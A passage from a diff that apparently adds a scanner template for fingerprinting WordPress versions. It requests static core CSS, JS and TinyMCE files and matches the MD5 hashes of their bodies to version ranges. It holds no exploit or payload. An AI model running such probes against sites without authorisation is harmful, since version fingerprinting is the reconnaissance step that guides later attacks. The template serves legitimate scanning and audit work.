"(\"49fb4126ed9cfd4b7509019a7490acb0\" == md5(body))" + - type: dsl + name: 4.5.3 - 4.5.23 + dsl: + - "(\"1618d0c7936444db76f6676767a8d743\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.2 + dsl: + - "(\"27b3b159d15842fe85708bb9fcfee677\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - 
"(\"b46f4f2afbda7e481b420a8ee19c7406\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"6e47a30fdc90cb4b42de68acf864c71a\" == md5(body))" + - type: dsl + name: 4.2.2 - 4.2.29 + dsl: + - "(\"26da4266c11d1a0eea6ebf1360b815d4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"78f1d835b79b5db9bd86cd7cf15d22ff\" == md5(body))" + - type: dsl + name: 4.1.5 - 4.1.32 + dsl: + - "(\"890c56f7df87f0b1ecd96e2068f60dd0\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.4 + dsl: + - "(\"f7cc436db8ef131f0d0543bc729bf1b1\" == md5(body))" + - type: dsl + name: 4.0.5 - 4.0.32 + dsl: + - "(\"994a37d7ed6d3711130b74ac05f554a7\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.4 + dsl: + - "(\"2e75ba1f0636242ddc242c5043816052\" == md5(body))" + - type: dsl + name: 3.9.6 - 3.9.33 + dsl: + - "(\"b81c1479c74443d87373adb8f83ccb33\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.5 + dsl: + - "(\"d0fde0102413e2b4a5b7922569391ecb\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"6319d1ae71068739dc713d26fd7da312\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"3f6ceb77ea8c1b75b748179215519ec5\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.16 + dsl: + - "(\"40b2c5a72f36fa6375bdb67e26ea8b4d\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"b7d6f9102a09ce8f774d7cf359a70db3\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2c8e94e3d93ccbf91a114e3bd34b0aca\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"7a3c939a198ba5e0ac4145a731f17127\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"e9bdf549df031fe6b583e818dac7e4fd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-layout.css" + matchers: + - type: dsl + name: 1.2-mingus - 1.2.2 + dsl: + - "(\"3eb56f763814712c192902a8c48b0c23\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"7140e06c00ed03d2bb3dad7672557510\" == md5(body))" + - type: dsl + name: 1.2-delta + dsl: + - "(\"1bcc9253506c067eb130c9fc4f211a2f\" == 
md5(body))" + - type: dsl + name: 1.0-platinum - 1.0.2 + dsl: + - "(\"30bb4eebd20e27e399dbb8a5106d52e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/dashboard.dev.css" + matchers: + - type: dsl + name: 3.2.1 + dsl: + - "(\"fd95127ba19547f5e4bd54307ea401e5\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"a8b2505542267a8315fb283bd5073dcc\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"c403505339df2ef6bb916674e6bcb267\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"88e52fb011e57e6c3c8d95f8009531f3\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"f741cc75faba09aa2f7e0b628e2b2b2a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/global-rtl.dev.css" + matchers: + - type: dsl + name: 3.2.1 + dsl: + - "(\"e8cafb493fccd3a14877aecbabea22bb\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"a2741e62a5cc2bd28d8346c004eba7bd\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"c1d3b68a32d1c6dbed770377865764ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this.dev.css" + matchers: + - type: dsl + name: 3.2.1 + dsl: + - "(\"61db67d7f5c655ce5176dc6204415e5d\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"ffdc847cfa0a6dc1ee2df38a53c28bd2\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"4ed3a64ed29775c1ad595f289a68736d\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"b720cd428c4af7aa2eb2544184cb166c\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"eceb5757d946022c22cbecf1b48643ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/login.dev.css" + matchers: + - type: dsl + name: 3.2.1 + dsl: + - "(\"1d28a5b5ee8474f5f07e9bf15a4cc49a\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"2b2e425ed02d774f5fc008f71b141d08\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"941cf7af3623be120885691b0a57ec07\" == md5(body))" + - type: dsl 
+ name: 3.0 - 3.0.6 + dsl: + - "(\"49553c264b4bf194f17112e1e7f08a70\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"ddfa3c98b711770b07844a19dc6a9bed\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/blank.htm" + matchers: + - type: dsl + name: 2.8 - 3.3.3 + dsl: + - "(\"5dbbcbc1f4bcbe5fe9f22905a7838b57\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"e176e3f6f068f68640de4406478ea37b\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"b8e395746dadd82553f7e05d94773218\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"f5dd51facba3214e941d12247feae2d0\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"88783f6e539184616896268bca04c25e\" == md5(body))" + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"c071fad481334f6b06d4bb55bc76c2fe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/wp-admin-rtl.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"430f5376bd650ad0d75e1787e7e75314\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"8a365e61385d019a68dded6919e9c0a3\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"9a959ab5f438970e3ff6b81b14e2351e\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"c5403fa2bb45c8eb102e4e958c5ab1fd\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"c5a3ecbfc6a9f60214435ec893017a19\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"55577eddb6e3a2202771c05ed26119a3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/install.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"809806c9cea0cd14d38a25340315c89c\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"c44ed273034db1588c715a236235a24e\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"c0e587488b912245dbc1fe87fd58375d\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"eed157f75067e0523c72267c8a1718a9\" == md5(body))" + 
- type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"69ef93c7c6205b765fe37ea39dcb3c11\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"a5c83eec566f3e926cb8b94f22097932\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"0380e33272aa60d16b2e7d405e7288a8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/media.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"aa77cf5c3eb6ddabf49afe6742509b5b\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a5ca39c7ff5b120c1f8b3030bfc72a66\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"f9755a2abfe8ebdf14ae665d4e64f25b\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"7b2de212dde19888dc191e7ba40c967e\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"3022f5720f96991c5279819e4ccd9db6\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"02de355bba3fdcecdd38a8ebe1a2d9d9\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"5317f5da30c076dac3987e5b56813920\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/common.dev.js" + matchers: + - type: dsl + name: 3.4.1 - 3.4.2 + dsl: + - "(\"6cad1cbac77651c7e35bf55210e28d3e\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"d50cb86c0c59bddf298adc39d6a41f60\" == md5(body))" + - type: dsl + name: 3.3.1 - 3.3.3 + dsl: + - "(\"2ede6e863d4ef607c8e6af1cb77fec2b\" == md5(body))" + - type: dsl + name: 3.3 + dsl: + - "(\"15668f1c67a3fdb80cf021e231c085d8\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"58213695ac22fbc3c2f6e159e2448b46\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"aeb8ffae99a8f3964c9c0ca140746afa\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"6fe3a82e70ceb1449146e3983fff91ac\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"60ad751677c87b314023944364431b13\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"b3006945c3b8408f9c889b6aa6d28e44\" 
== md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/wp-fullscreen.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"223fc3c5b7e5c2ae8abe9879ba07dda5\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"549c843c51999ff7afb8ce4c4e36a253\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"70d51eecfd8d02a5f538c3be731fdedd\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"ff1fafac6a69b8ebced1965e18e39b4a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/post.dev.js" + matchers: + - type: dsl + name: 3.4.2 + dsl: + - "(\"b7f14147f98e067f4c2df1cba298fd1a\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"c2ba4c3bc967522600340dfdcbc43ba8\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a56486988bfc38afea319ac5eef68319\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"9a167e3d4423d210de6d92a7695a0ec3\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"1ec85e4fa152f77e087102225304d588\" == md5(body))" + - type: dsl + name: 3.0.5 - 3.0.6 + dsl: + - "(\"580e3d6a8e88257b921a534c26560007\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.4 + dsl: + - "(\"73299ae2e6e8681b5eb9949706dcbb34\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"3c69319888144b5904c10ad64b999972\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"4758b37ba0588d0100bfad9ea7557bf9\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"392cf5bd0d18d352cf7e8178d5870be0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/link.htm" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"73d4ffe078d60f5d63452e2c3e95182b\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9953ab56d24df2c43e7591217d779dd3\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"bdae891eeba96b0585eb0d978699e605\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - 
"(\"4864f8eb687dabbff4cd9d8ecba8c712\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"9406f7c7c89bbc67a698389c124e2bcd\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"f8cb995525a428d3df2a44799900f2f7\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"86603ac86e519d4d65fe077fb4d8d0be\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"9a7dca501ff7b62ada027341cd7a397b\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"6e15e3be35cdb751d367f1dc8be34cf1\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"c151d8e1c8463b8589921ae9892952a7\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"60fb3a31220b50974228b898d13bfde4\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"f4cbb390a6cc806a6f888009696800d5\" == md5(body))" + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"45ca8fb38d196c8b814490a71fa2f85a\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"a271bba6f7c066798d2c114a56fb21ec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/content.css" + matchers: + - type: dsl + name: 3.4 - 3.8.35 + dsl: + - "(\"15f8ca03ff46bc3c16562a95209ae0bb\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"16c6bfc29480dd1a2a3c6b51b114a265\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"39a1f5027797e7dd27e2d91d26238fde\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"81929c113470c66349b5086c6c7c9af0\" == md5(body))" + - type: dsl + name: 2.6 - 3.0.6 + dsl: + - "(\"2f921f2c07fa24953530b23bf2000e0a\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"a4af9e6f7f306b7f4d39a7f59ca11df6\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"a47375f8211aceb57d7e67e04b491007\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/content.css" + matchers: + - type: dsl + name: 3.4 - 3.8.35 + dsl: + - 
"(\"07708a7c49751ba1f9389079a56f2c91\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"5274a3388475f362aba65bee56b7e411\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"1b6df3b8b3edd3090ef2011ced0f9ac7\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"8e5284aa00887f6021be94410dce6ee3\" == md5(body))" + - type: dsl + name: 2.6 - 3.0.6 + dsl: + - "(\"4a0a94603795b7bfc41ff76ea8889db7\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"c15313eca2138543d9f4e5b8407b496c\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"eb01e343c4903eb57aa0ab0afa7e20d8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/about.htm" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"742d8c3e934a99a6b55ddc1f9f0eb71d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"50218b28d236faa546d606dd90c2ed2f\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"41d67913c326587ac7f2090fb74f5319\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"90787383a6434187195dd40aa95d237a\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"11a6f93926ee36c97ee508c50fbb2e8d\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"ba3007568a4487475949ac2ace24604d\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"7e80709c52260a0022f7f336b72cd71b\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"6d3c5cbc4021ae8df64a1fe3e7040b11\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"883daf4c2686b667cdf5d0ee58368a47\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"04045286f214bd0e5f556f393301dd7e\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"2102cad8b48c2e05fa8ec2fd6be6c7e9\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"64c9568b29bc06652f9ece85691ecb1f\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"f33f7fa8ff16f5ea67777719e51ea349\" == 
md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"2c9c1f6943a7b7a42b6e0aef5130f6db\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/anchor.htm" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"d39a84bbf89e1dbc300f44d4c6eff520\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"0df79f28cd97ce273b7ee98f40deee20\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"e013e73a9ff93156080ab087eb5cf69b\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"3f89e79d6c5aed7408b4132a520f5a66\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"702e8eda7a729cb67e6c8dd28adbaa01\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"7d6b77bd3ac2520fb484c7bac27922bb\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"b84f177905e368a80d9a25e728182794\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"e44a7c747828cc6698fc07842f1f2d1b\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"f427c67e07e8f6a7df8c8af1961daec6\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"f8e8fc869fa2768176d5c458eece8c4a\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"fd990e3a5b37af121d77d30b75fc8f2b\" == md5(body))" + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"fcdc4522e42d5e4eb46a43ba771a16c0\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"2d6479966b6e403561858a3aa2404a33\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/source_editor.htm" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"f7dcaeb5cc281bdecf6330ca986fa439\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"abc891ffe0a1920e7dda4845e1ed5973\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"ead9f98478f78b005bc67cd2a49613b3\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"8e0c1bef01e1a98388d141c53a05848b\" == md5(body))" 
+ - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"6268293d96f5baa48db1f2a54b657d76\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"541099ed16670e5299df3e6ecf61e7fa\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"4b5f5a3e7846a30fe9dcb878f9e8f2cb\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"7dca75fdff97de1cc2702c1782952605\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"c190bbe830b5985cb2c264ab8fae46b5\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"4728edfe58fc5b781c4fc2e1f90e0bb2\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"f02303f69ff29bcd11411b40ac2147e7\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"b5848d93559f1f58ca28eb10a63df54d\" == md5(body))" + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"1b6d02c486a9c4c1e47b9cda373e18a9\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"6c74ba36d1e5d571adcf8247f5e29ab4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/color_picker.htm" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"7fccf0616c87a689f089433a68141979\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f3105897d46f25ee0de51b86d702757a\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"af19a270b1d81e1f110849c67b9943b8\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"6ed9c179e0db33ec6731caee24ed7aed\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"739e889aa58742bdb4931babc80316f0\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"289f30cdd11f8a23c6458f1319323791\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"a7a73c580a302db16002989c84c5bf4c\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"20d0972f30e29d1518a657e90074020a\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"2c161f4ab885f01643bad16fba20661b\" == md5(body))" + - type: dsl + 
name: 2.5.1 + dsl: + - "(\"5a20037a144e58522a11fdd71352ae08\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"01474b7f41da7d851c5a7f27aa2f2ff0\" == md5(body))" + - type: dsl + name: 2.2.1 - 2.3.3 + dsl: + - "(\"d3e7f564e4bea2af433d6f7f882370ab\" == md5(body))" + - type: dsl + name: 2.1 - 2.2 + dsl: + - "(\"e5641589c55d58143a5a14e5332428c0\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"742c7e852f2d121b5be88781ff0b93f6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/editor_template.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"a2b3085f0ab3c323dd28187b739139ec\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f2b1d655935e99315b93c540c6035c48\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"fd2835b5c1610d37e4f546cd45bdbbda\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"53051500ea1cae4d71a092378ae1726b\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"de50f43e740d9bcbb0bb5e5f31b0c45a\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"e4f47b78c98d99433c91ec4a145f7ff5\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"f063bd5bed9288e08acd8c6364f6679d\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"6b1b4ae45fe39b7b444d0dac8bbeb400\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"0b6cb9758b31dc49a1e6051dc67f56fa\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"dbe88526b02537b5670af1ae17b297df\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"caa70b329a15b7d276880d62a5d3b5cf\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"67c40f06846a456511d8688419451c18\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"fd5269ae542aca16ad8281ac551a576c\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"cc473d433ad83e107f8b417f8e07eb38\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/image.htm" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"7a6c90019843b98b685e2822412b6bcb\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"51398bf0a698cf6c3e3d4b76974804f8\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"b56263cc02fff500f707f51a797200ca\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"c4e555a4eb2d92b12cc274299893f5fb\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"a17cd268c9d523bf70ecf19757b93e22\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"549603c2a4def6160db28176cd7d7bc4\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"08e69d593392dd50963dcb346ca0071c\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"0d385db27642478443914ec2178e195c\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"019909ddbc8340e59cd64f4cdae21a6e\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"9c4fabe49f0526f70a897c86a49c7b1a\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"b9f13e7b518cdf55a2617f44aa6426fa\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"cd1355d6758f2d58982afda2c4b917fe\" == md5(body))" + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"6ee929f893a3cf67861b023f905baadd\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"390092c8f6af60b9a9d78fbdaf97d72a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/image.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"8d2c4871c2b431d003267d1ecebfecde\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"57b35a2d982e16ac9aac069345ec2300\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"27769fa50375e33e24e75cd356c085f4\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"10491e5ab4b2b507f18e0be5db37fbb7\" == md5(body))" + - type: dsl + name: 2.7 - 3.0.6 + dsl: + - 
"(\"fd4ba60e7499e1e06d8efc5841073a44\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"a8dd2a6733f5937952e90c7e80421905\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"088245408531c58bb52cc092294cc384\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"862f066cad8e2a478c43814f338fdd8c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/charmap.htm" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"e78d30352be54ce072b327c3f3ae5a1e\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"b2e2867e42e971a960e22d7fc355ba18\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"54f0b3a52f3bdecfae2fdaf9fa93a27c\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"119ead6c5c35d15999f47fa1ea8ea002\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"15e312d22a33ce3cade0ca6dd0a2ff06\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"90449ecb50b0aa527586a7217c136009\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"cf2e5b2fec3c06f763bd176d87ed4d0e\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"e514a461b0948068811c317af82305f0\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"63f3245f9cefd08530d8035399242d82\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"cafb84f559d7de79277a5b96a0e45f4a\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - 